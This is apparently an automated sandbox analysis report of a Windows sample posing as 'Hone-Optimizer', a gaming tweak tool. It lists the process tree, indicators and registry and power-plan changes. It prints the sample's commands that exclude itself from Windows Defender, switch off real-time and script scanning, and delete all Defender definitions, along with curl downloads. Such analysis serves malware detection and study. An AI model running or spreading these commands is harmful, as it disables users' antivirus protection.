description pid Process procid_target PID 2292 wrote to memory of 3632 2292 Hone-Optimizer.exe 82 PID 2292 wrote to memory of 3632 2292 Hone-Optimizer.exe 82 PID 3632 wrote to memory of 3088 3632 Hone-Optimizer.exe 84 PID 3632 wrote to memory of 3088 3632 Hone-Optimizer.exe 84 PID 3632 wrote to memory of 4932 3632 Hone-Optimizer.exe 85 PID 3632 wrote to memory of 4932 3632 Hone-Optimizer.exe 85 PID 3632 wrote to memory of 2148 3632 Hone-Optimizer.exe 88 PID 3632 wrote to memory of 2148 3632 Hone-Optimizer.exe 88 PID 3632 wrote to memory of 4572 3632 Hone-Optimizer.exe 89 PID 3632 wrote to memory of 4572 3632 Hone-Optimizer.exe 89 PID 3632 wrote to memory of 1780 3632 Hone-Optimizer.exe 91 PID 3632 wrote to memory of 1780 3632 Hone-Optimizer.exe 91 PID 3632 wrote to memory of 3192 3632 Hone-Optimizer.exe 94 PID 3632 wrote to memory of 3192 3632 Hone-Optimizer.exe 94 PID 4932 wrote to memory of 2452 4932 cmd.exe 96 PID 4932 wrote to memory of 2452 4932 cmd.exe 96 PID 3088 wrote to memory of 5112 3088 cmd.exe 97 PID 3088 wrote to memory of 5112 3088 cmd.exe 97 PID 2148 wrote to memory of 1772 2148 cmd.exe 98 PID 2148 wrote to memory of 1772 2148 cmd.exe 98 PID 1780 wrote to memory of 1212 1780 cmd.exe 99 PID 1780 wrote to memory of 1212 1780 cmd.exe 99 PID 3192 wrote to memory of 2008 3192 cmd.exe 100 PID 3192 wrote to memory of 2008 3192 cmd.exe 100 PID 4572 wrote to memory of 3276 4572 cmd.exe 101 PID 4572 wrote to memory of 3276 4572 cmd.exe 101 PID 3276 wrote to memory of 1872 3276 bound.exe 104 PID 3276 wrote to memory of 1872 3276 bound.exe 104 PID 1872 wrote to memory of 1184 1872 cmd.exe 105 PID 1872 wrote to memory of 1184 1872 cmd.exe 105 PID 1872 wrote to memory of 1744 1872 cmd.exe 107 PID 1872 wrote to memory of 1744 1872 cmd.exe 107 PID 3632 wrote to memory of 4244 3632 Hone-Optimizer.exe 108 PID 3632 wrote to memory of 4244 3632 Hone-Optimizer.exe 108 PID 1872 wrote to memory of 3964 1872 cmd.exe 110 PID 1872 wrote to memory of 3964 1872 cmd.exe 110 PID 1872 wrote to memory of 4808 1872 cmd.exe 111 PID 1872 wrote to memory of 4808 1872 cmd.exe 111 PID 4244 wrote to memory of 1508 4244 cmd.exe 112 PID 4244 wrote to memory of 1508 4244 cmd.exe 112 PID 1872 wrote to memory of 2532 1872 cmd.exe 161 PID 1872 wrote to memory of 2532 1872 cmd.exe 161 PID 3632 wrote to memory of 1004 3632 Hone-Optimizer.exe 114 PID 3632 wrote to memory of 1004 3632 Hone-Optimizer.exe 114 PID 1872 wrote to memory of 4820 1872 cmd.exe 162 PID 1872 wrote to memory of 4820 1872 cmd.exe 162 PID 1004 wrote to memory of 4248 1004 cmd.exe 117 PID 1004 wrote to memory of 4248 1004 cmd.exe 117 PID 3632 wrote to memory of 4412 3632 Hone-Optimizer.exe 118 PID 3632 wrote to memory of 4412 3632 Hone-Optimizer.exe 118 PID 4412 wrote to memory of 4476 4412 cmd.exe 120 PID 4412 wrote to memory of 4476 4412 cmd.exe 120 PID 3632 wrote to memory of 1236 3632 Hone-Optimizer.exe 121 PID 3632 wrote to memory of 1236 3632 Hone-Optimizer.exe 121 PID 4932 wrote to memory of 4240 4932 cmd.exe 123 PID 4932 wrote to memory of 4240 4932 cmd.exe 123 PID 1236 wrote to memory of 4692 1236 cmd.exe 124 PID 1236 wrote to memory of 4692 1236 cmd.exe 124 PID 3632 wrote to memory of 3776 3632 Hone-Optimizer.exe 125 PID 3632 wrote to memory of 3776 3632 Hone-Optimizer.exe 125 PID 3632 wrote to memory of 4748 3632 Hone-Optimizer.exe 126 PID 3632 wrote to memory of 4748 3632 Hone-Optimizer.exe 126 PID 3776 wrote to memory of 216 3776 cmd.exe 129 PID 3776 wrote to memory of 216 3776 cmd.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 3656 attrib.exe 5024 attrib.exe -
cURL User-Agent 7 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 96 curl/8.7.1 HTTP User-Agent header 34 curl/8.7.1 HTTP User-Agent header 62 curl/8.7.1 HTTP User-Agent header 69 curl/8.7.1 HTTP User-Agent header 70 curl/8.7.1 HTTP User-Agent header 93 curl/8.7.1 HTTP User-Agent header 95 curl/8.7.1
Processes
-
C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3632 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:4240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3276 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6E5A.tmp\6E5B.tmp\6E5C.bat C:\Users\Admin\AppData\Local\Temp\bound.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\system32\mode.comMode 130,456⤵PID:1184
-
-
C:\Windows\system32\reg.exereg add HKLM /F6⤵
- Modifies registry key
PID:1744
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\CrashControl" /v "DisplayParameters" /t REG_DWORD /d "1" /f6⤵PID:3964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"6⤵PID:4808
-
-
C:\Windows\system32\reg.exereg add HKCU\CONSOLE /v VirtualTerminalLevel /t REG_DWORD /d 1 /f6⤵
- Modifies registry key
PID:2532
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "Disclaimer"6⤵PID:4820
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Hone" /v "Disclaimer" /f6⤵PID:1976
-
-
C:\Windows\system32\curl.execurl -g -L -# -o "C:\Users\Admin\AppData\Local\Temp\Updater.bat" "https://raw.githubusercontent.com/auraside/HoneCtrl/main/Files/HoneCtrlVer"6⤵PID:2132
-
-
C:\Windows\system32\Dism.exedism /online /enable-feature /featurename:MicrosoftWindowsWMICore /NoRestart6⤵
- Drops file in Windows directory
PID:3372 -
C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exeC:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe {3F511729-BF4E-4763-8326-9B58EB2EF9F5}7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:2840
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f6⤵PID:1384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\', 'D:\', 'E:\', 'F:\', 'G:\'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Unrestricted -NoProfile Checkpoint-Computer -Description 'Hone Restore Point'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4304
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c date /t6⤵PID:3648
-
-
C:\Windows\system32\reg.exereg export HKCU C:\Hone\HoneRevert\11.14.2024\HKLM.reg /y6⤵PID:3584
-
-
C:\Windows\system32\reg.exereg export HKCU C:\Hone\HoneRevert\11.14.2024\HKCU.reg /y6⤵PID:1752
-
-
C:\Windows\system32\mode.comMode 130,456⤵PID:4368
-
-
C:\Windows\System32\choice.exeC:\Windows\System32\choice.exe /c:1234567XD /n /m " Select a corresponding number to the options above > "6⤵PID:4828
-
-
C:\Windows\system32\mode.comMode 130,456⤵PID:4988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"6⤵PID:1900
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get PNPDeviceID7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4560
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:3996
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:3836
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:4168
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:1364
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"6⤵PID:5076
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_NetworkAdapter get PNPDeviceID7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3100
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:2368
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:3844
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:3988
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:872
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value6⤵PID:1508
-
C:\Windows\System32\Wbem\WMIC.exewmic os get TotalVisibleMemorySize /value7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"6⤵PID:3244
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"7⤵PID:712
-
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NVTTweaks"6⤵PID:5092
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"6⤵PID:3596
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"7⤵PID:544
-
-
C:\Windows\system32\findstr.exefindstr "HKEY"7⤵PID:4948
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"6⤵PID:2952
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:2860
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"6⤵PID:2224
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:116
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"6⤵PID:1168
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:3248
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"6⤵PID:3272
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:1108
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"6⤵PID:560
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:3168
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass6⤵PID:4652
-
-
C:\Windows\system32\find.exefind "0x4"6⤵PID:3936
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority6⤵PID:1276
-
-
C:\Windows\system32\find.exefind "0x3"6⤵PID:2160
-
-
C:\Windows\system32\powercfg.exepowercfg /GetActiveScheme6⤵
- Power Settings
PID:2728
-
-
C:\Windows\system32\find.exefind "Hone"6⤵PID:1660
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AllGPUTweaks"6⤵PID:3524
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NpiTweaks"6⤵PID:460
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "TCPIP"6⤵PID:2956
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NvidiaTweaks"6⤵PID:5060
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MemoryTweaks"6⤵PID:1308
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "InternetTweaks"6⤵PID:4708
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "ServicesTweaks"6⤵PID:700
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "DebloatTweaks"6⤵PID:4020
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MitigationsTweaks"6⤵PID:4536
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AffinityTweaks"6⤵PID:844
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"6⤵PID:4304
-
-
C:\Windows\system32\reg.exereg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"6⤵PID:3648
-
-
C:\Windows\system32\find.exefind "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"6⤵PID:3264
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"6⤵PID:3584
-
-
C:\Windows\system32\find.exefind "0x400"6⤵PID:1164
-
-
C:\Windows\system32\sc.exesc query STR6⤵
- Launches sc.exe
PID:3740
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:2364
-
-
C:\Windows\system32\sc.exesc query HoneAudio6⤵
- Launches sc.exe
PID:896
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:4968
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_Battery Get BatteryStatus6⤵PID:3340
-
-
C:\Windows\system32\find.exefind "1"6⤵PID:4568
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value6⤵PID:2376
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_VideoController get VideoProcessor /value7⤵PID:1076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:1716
-
-
C:\Windows\system32\find.exefind "GeForce"6⤵PID:4988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:924
-
-
C:\Windows\system32\find.exefind "NVIDIA"6⤵PID:5116
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4444
-
-
C:\Windows\system32\find.exefind "RTX"6⤵PID:3996
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:1760
-
-
C:\Windows\system32\find.exefind "GTX"6⤵PID:4168
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:2840
-
-
C:\Windows\system32\find.exefind "AMD"6⤵PID:4276
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4024
-
-
C:\Windows\system32\find.exefind "Ryzen"6⤵PID:3724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:3328
-
-
C:\Windows\system32\find.exefind "Intel"6⤵PID:3844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:1384
-
-
C:\Windows\system32\find.exefind "UHD"6⤵PID:872
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo [91mOFF "6⤵PID:3964
-
-
C:\Windows\system32\find.exefind "N/A"6⤵PID:1508
-
-
C:\Windows\system32\curl.execurl -g -k -L -# -o "C:\Hone\Resources\HoneV2.pow" "https://github.com/auraside/HoneCtrl/raw/main/Files/HoneV2.pow"6⤵PID:712
-
-
C:\Windows\system32\powercfg.exepowercfg /d 44444444-4444-4444-4444-4444444444496⤵
- Power Settings
PID:224
-
-
C:\Windows\system32\powercfg.exepowercfg -import "C:\Hone\Resources\HoneV2.pow" 44444444-4444-4444-4444-4444444444496⤵
- Power Settings
PID:3688
-
-
C:\Windows\system32\powercfg.exepowercfg /changename 44444444-4444-4444-4444-444444444449 "Hone Ultimate Power Plan V2" "The Ultimate Power Plan to increase FPS, improve latency and reduce input lag."6⤵
- Power Settings
PID:4348
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get numberOfCores /value6⤵PID:4460
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get numberOfCores /value7⤵PID:4636
-
-
-
C:\Windows\system32\powercfg.exepowercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 06⤵
- Power Settings
PID:4220
-
-
C:\Windows\system32\powercfg.exepowercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 06⤵
- Power Settings
PID:1116
-
-
C:\Windows\system32\powercfg.exepowercfg -setactive "44444444-4444-4444-4444-444444444449"6⤵
- Power Settings
PID:4484
-
-
C:\Windows\system32\mode.comMode 130,456⤵PID:4224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"6⤵PID:1548
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get PNPDeviceID7⤵PID:2336
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:1204
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:1544
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:3936
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:2348
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"6⤵PID:4356
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_NetworkAdapter get PNPDeviceID7⤵PID:1440
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:3476
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:3788
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:2496
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:4412
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value6⤵PID:1220
-
C:\Windows\System32\Wbem\WMIC.exewmic os get TotalVisibleMemorySize /value7⤵PID:4748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"6⤵PID:3348
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"7⤵PID:4380
-
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NVTTweaks"6⤵PID:4188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"6⤵PID:3648
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"7⤵PID:4540
-
-
C:\Windows\system32\findstr.exefindstr "HKEY"7⤵PID:3004
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"6⤵PID:3792
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:1752
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"6⤵PID:4592
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:3728
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"6⤵PID:2728
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:1396
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"6⤵PID:4628
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:4468
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"6⤵PID:4048
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:4828
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass6⤵PID:2376
-
-
C:\Windows\system32\find.exefind "0x4"6⤵PID:4136
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority6⤵PID:4988
-
-
C:\Windows\system32\find.exefind "0x3"6⤵PID:1976
-
-
C:\Windows\system32\powercfg.exepowercfg /GetActiveScheme6⤵
- Power Settings
PID:5116
-
-
C:\Windows\system32\find.exefind "Hone"6⤵PID:1900
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AllGPUTweaks"6⤵PID:3996
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NpiTweaks"6⤵PID:3404
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "TCPIP"6⤵PID:4168
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NvidiaTweaks"6⤵PID:4064
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MemoryTweaks"6⤵PID:4276
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "InternetTweaks"6⤵PID:2368
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "ServicesTweaks"6⤵PID:3724
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "DebloatTweaks"6⤵PID:1492
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MitigationsTweaks"6⤵PID:3844
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AffinityTweaks"6⤵PID:3156
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"6⤵PID:872
-
-
C:\Windows\system32\reg.exereg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"6⤵PID:4268
-
-
C:\Windows\system32\find.exefind "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"6⤵PID:3388
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"6⤵PID:1132
-
-
C:\Windows\system32\find.exefind "0x400"6⤵PID:2980
-
-
C:\Windows\system32\sc.exesc query STR6⤵
- Launches sc.exe
PID:3380
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:4676
-
-
C:\Windows\system32\sc.exesc query HoneAudio6⤵
- Launches sc.exe
PID:544
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:2532
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_Battery Get BatteryStatus6⤵PID:3596
-
-
C:\Windows\system32\find.exefind "1"6⤵PID:3688
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value6⤵PID:4636
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_VideoController get VideoProcessor /value7⤵PID:2204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:3248
-
-
C:\Windows\system32\find.exefind "GeForce"6⤵PID:4484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:1084
-
-
